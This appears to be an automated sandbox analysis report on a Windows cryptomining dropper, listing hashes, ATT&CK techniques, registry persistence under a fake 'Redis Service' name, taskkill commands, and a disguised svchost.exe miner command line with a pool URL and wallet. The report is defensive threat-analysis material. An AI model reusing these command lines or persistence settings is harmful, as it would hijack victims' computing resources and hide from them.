a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e

Analysis

max time kernel
143s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2022 10:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
Size

5.8MB
MD5

9e28a598e94be94921938cb38162b5f5
SHA1

d5255f860653112c66d6158a4cee6de51fd3cd0f
SHA256

a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e
SHA512

0cd61bcc67371965708e924190271a2ca3da7838248aa38d8730c031c3e24ff2963063d9b25fd06f5ed702867ca7e834806ed723eee0aa41db3670d228325430
SSDEEP

98304:Og2iA8+gmkdHaGVG8U0L23Scg0kNZVf2wDCTVcYQC/8V/ncQ1nO6UAahTuvgfC:5vmkdHaSG8Ahg0eZVfFeTVju/ncQdAAG

Score

8^/10

persistence vmprotect

Malware Config

Signatures

Executes dropped EXE 2 IoCs

Processes:

ntsmss.exesvchost.exe

pid process

3864 ntsmss.exe
2744 svchost.exe

pid	process
3864	ntsmss.exe
2744	svchost.exe

VMProtect packed file 5 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/2744-160-0x0000000180000000-0x00000001800C2000-memory.dmp	vmprotect
C:\Users\Admin\AppData\Local\Temp\libcurl.dll	vmprotect
C:\Users\Admin\AppData\Local\Temp\libcurl.dll	vmprotect
behavioral2/memory/2744-162-0x0000000180000000-0x00000001800C2000-memory.dmp	vmprotect
behavioral2/memory/2744-164-0x0000000180000000-0x00000001800C2000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exentsmss.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	ntsmss.exe

Loads dropped DLL 4 IoCs

Processes:

svchost.exe

pid process

2744 svchost.exe
2744 svchost.exe
2744 svchost.exe
2744 svchost.exe

pid	process
2744	svchost.exe
2744	svchost.exe
2744	svchost.exe
2744	svchost.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exentsmss.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Windows Redis Service = "C:\\Users\\Admin\\AppData\\Roaming\\Redis\\ntsmss.exe"	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	ntsmss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Windows Redis Service = "C:\\Users\\Admin\\AppData\\Roaming\\Redis\\ntsmss.exe"	ntsmss.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows\CurrentVersion\Run	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows Redis Service = "C:\\Users\\Admin\\AppData\\Roaming\\Redis\\ntsmss.exe"	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Kills process with taskkill 8 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4116 taskkill.exe
4184 taskkill.exe
4036 taskkill.exe
2656 taskkill.exe
3152 taskkill.exe
3800 taskkill.exe
4704 taskkill.exe
552 taskkill.exe

pid	process
4116	taskkill.exe
4184	taskkill.exe
4036	taskkill.exe
2656	taskkill.exe
3152	taskkill.exe
3800	taskkill.exe
4704	taskkill.exe
552	taskkill.exe

Modifies registry class 2 IoCs

Processes:

a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exentsmss.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	ntsmss.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exentsmss.exe

pid	process
1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
3864	ntsmss.exe
3864	ntsmss.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeDebugPrivilege	3800	taskkill.exe
Token: SeDebugPrivilege	3152	taskkill.exe
Token: SeDebugPrivilege	4704	taskkill.exe
Token: SeDebugPrivilege	552	taskkill.exe
Token: SeDebugPrivilege	4184	taskkill.exe
Token: SeDebugPrivilege	4116	taskkill.exe
Token: SeDebugPrivilege	4036	taskkill.exe
Token: SeLockMemoryPrivilege	2744	svchost.exe

Suspicious use of WriteProcessMemory 29 IoCs

Processes:

a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exentsmss.exe

description	pid	process	target process
PID 1592 wrote to memory of 2656	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 2656	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 2656	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 3800	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 3800	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 3800	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 3152	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 3152	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 3152	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 4704	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 4704	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 4704	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	taskkill.exe
PID 1592 wrote to memory of 3864	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	ntsmss.exe
PID 1592 wrote to memory of 3864	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	ntsmss.exe
PID 1592 wrote to memory of 3864	1592	a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe	ntsmss.exe
PID 3864 wrote to memory of 552	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 552	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 552	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 4116	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 4116	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 4116	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 4184	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 4184	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 4184	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 4036	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 4036	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 4036	3864	ntsmss.exe	taskkill.exe
PID 3864 wrote to memory of 2744	3864	ntsmss.exe	svchost.exe
PID 3864 wrote to memory of 2744	3864	ntsmss.exe	svchost.exe

C:\Users\Admin\AppData\Local\Temp\a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
"C:\Users\Admin\AppData\Local\Temp\a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1592

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im CheckServer.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2656

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im WerFault.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3152

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im cmd.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3800

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im exceptionfilter.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Users\Admin\AppData\Roaming\Redis\ntsmss.exe
"C:\Users\Admin\AppData\Roaming\Redis\ntsmss.exe" C:\Users\Admin\AppData\Local\Temp\a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e.exe
2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3864

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im CheckServer.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:552

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im cmd.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4116

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im WerFault.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4184

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im exceptionfilter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4036

C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe" -a cryptonight -o stratum+tcp://pool.cryptoescrow.eu:3333 -u 46sSETXrZGT8bupxdc2MAbLe3PMV9nJTRTE5uaFErXFz6ymyzVdH86KDb9TNoG4ny5QLELfopynWeBSMoT1M2Ga8RBkDqTH -p x -t 2
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2744

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MSVCR100.dll
Filesize
809KB

MD5
366fd6f3a451351b5df2d7c4ecf4c73a

SHA1
50db750522b9630757f91b53df377fd4ed4e2d66

SHA256
ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5

SHA512
2de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl.dll
Filesize
341KB

MD5
d1c5379a98047acadaf97b35dcb239e3

SHA1
9b60fcab990cbbb237b15e6a52e29ffabca13760

SHA256
90100f13e683e8ea8196a938a9f1aad8888211a395afaba6bb55359767e00f26

SHA512
acd489256514510ff23500d9340533d4dac3e362d8f38ebf9e46fffb051b75bfd844e325ffd39b980114f718e09b3cdf01716600e14d9263ad139e0119bec841

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl.dll
Filesize
341KB

MD5
d1c5379a98047acadaf97b35dcb239e3

SHA1
9b60fcab990cbbb237b15e6a52e29ffabca13760

SHA256
90100f13e683e8ea8196a938a9f1aad8888211a395afaba6bb55359767e00f26

SHA512
acd489256514510ff23500d9340533d4dac3e362d8f38ebf9e46fffb051b75bfd844e325ffd39b980114f718e09b3cdf01716600e14d9263ad139e0119bec841

Download Submit
C:\Users\Admin\AppData\Local\Temp\msvcr100.dll
Filesize
809KB

MD5
366fd6f3a451351b5df2d7c4ecf4c73a

SHA1
50db750522b9630757f91b53df377fd4ed4e2d66

SHA256
ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5

SHA512
2de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130

Download Submit
C:\Users\Admin\AppData\Local\Temp\msvcr100.dll
Filesize
809KB

MD5
366fd6f3a451351b5df2d7c4ecf4c73a

SHA1
50db750522b9630757f91b53df377fd4ed4e2d66

SHA256
ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5

SHA512
2de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130

Download Submit
C:\Users\Admin\AppData\Local\Temp\pthreadVC2.dll
Filesize
81KB

MD5
4a502706d149c2f5854131a7758a90e2

SHA1
845842f909769a673138553748ad09e609ec3e17

SHA256
0e6af724609ef6846982ef717013426c359c455fff324e906d8d55c8bb88d16e

SHA512
1cdc7d92dfee299850fe8703509e3cf33470470d239b27ca9d5760d3fd01775c3512b80e4b9bdca9f782c2193be0c0a554c1bb37c1a99e435e96e14902386161

Download Submit
C:\Users\Admin\AppData\Local\Temp\pthreadVC2.dll
Filesize
81KB

MD5
4a502706d149c2f5854131a7758a90e2

SHA1
845842f909769a673138553748ad09e609ec3e17

SHA256
0e6af724609ef6846982ef717013426c359c455fff324e906d8d55c8bb88d16e

SHA512
1cdc7d92dfee299850fe8703509e3cf33470470d239b27ca9d5760d3fd01775c3512b80e4b9bdca9f782c2193be0c0a554c1bb37c1a99e435e96e14902386161

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe
Filesize
210KB

MD5
f269f2f43288c764d42ad78a6f2b09cb

SHA1
aefafdcb035f361e8786ce4e10e122684c674cbe

SHA256
3017c9c2d33d932e7180103cf86996d0df6de73c86eebd3f6425be188d8bcb93

SHA512
278f11d99ef8f393155151031273550de66526220f790646c343a7ce0114f37a4758d575e17ffeab74a5ccb77a8f139577ee0513478704f6422a0543b73a4b5d

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.exe
Filesize
210KB

MD5
f269f2f43288c764d42ad78a6f2b09cb

SHA1
aefafdcb035f361e8786ce4e10e122684c674cbe

SHA256
3017c9c2d33d932e7180103cf86996d0df6de73c86eebd3f6425be188d8bcb93

SHA512
278f11d99ef8f393155151031273550de66526220f790646c343a7ce0114f37a4758d575e17ffeab74a5ccb77a8f139577ee0513478704f6422a0543b73a4b5d

Download Submit
C:\Users\Admin\AppData\Roaming\Redis\ntsmss.exe
Filesize
5.8MB

MD5
9e28a598e94be94921938cb38162b5f5

SHA1
d5255f860653112c66d6158a4cee6de51fd3cd0f

SHA256
a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e

SHA512
0cd61bcc67371965708e924190271a2ca3da7838248aa38d8730c031c3e24ff2963063d9b25fd06f5ed702867ca7e834806ed723eee0aa41db3670d228325430

Download Submit
C:\Users\Admin\AppData\Roaming\Redis\ntsmss.exe
Filesize
5.8MB

MD5
9e28a598e94be94921938cb38162b5f5

SHA1
d5255f860653112c66d6158a4cee6de51fd3cd0f

SHA256
a503681d40c61ed77e36a2cc6dfa713744754a46907f6be4072e55f06cd4446e

SHA512
0cd61bcc67371965708e924190271a2ca3da7838248aa38d8730c031c3e24ff2963063d9b25fd06f5ed702867ca7e834806ed723eee0aa41db3670d228325430

Download Submit
memory/552-146-0x0000000000000000-mapping.dmp

Download
memory/1592-142-0x0000000000400000-0x000000000109F000-memory.dmp

Filesize
12.6MB

Download
memory/1592-132-0x0000000000400000-0x000000000109F000-memory.dmp

Filesize
12.6MB

Download
memory/1592-134-0x0000000000400000-0x000000000109F000-memory.dmp

Filesize
12.6MB

Download
memory/1592-133-0x0000000000400000-0x000000000109F000-memory.dmp

Filesize
12.6MB

Download
memory/2656-135-0x0000000000000000-mapping.dmp

Download
memory/2744-162-0x0000000180000000-0x00000001800C2000-memory.dmp

Filesize
776KB

Download
memory/2744-164-0x0000000180000000-0x00000001800C2000-memory.dmp

Filesize
776KB

Download
memory/2744-160-0x0000000180000000-0x00000001800C2000-memory.dmp

Filesize
776KB

Download
memory/2744-150-0x0000000000000000-mapping.dmp

Download
memory/3152-137-0x0000000000000000-mapping.dmp

Download
memory/3800-136-0x0000000000000000-mapping.dmp

Download
memory/3864-139-0x0000000000000000-mapping.dmp

Download
memory/3864-145-0x0000000000400000-0x000000000109F000-memory.dmp

Filesize
12.6MB

Download
memory/3864-144-0x0000000000400000-0x000000000109F000-memory.dmp

Filesize
12.6MB

Download
memory/3864-143-0x0000000000400000-0x000000000109F000-memory.dmp

Filesize
12.6MB

Download
memory/3864-163-0x0000000000400000-0x000000000109F000-memory.dmp

Filesize
12.6MB

Download
memory/4036-149-0x0000000000000000-mapping.dmp

Download
memory/4116-147-0x0000000000000000-mapping.dmp

Download
memory/4184-148-0x0000000000000000-mapping.dmp

Download
memory/4704-138-0x0000000000000000-mapping.dmp

Download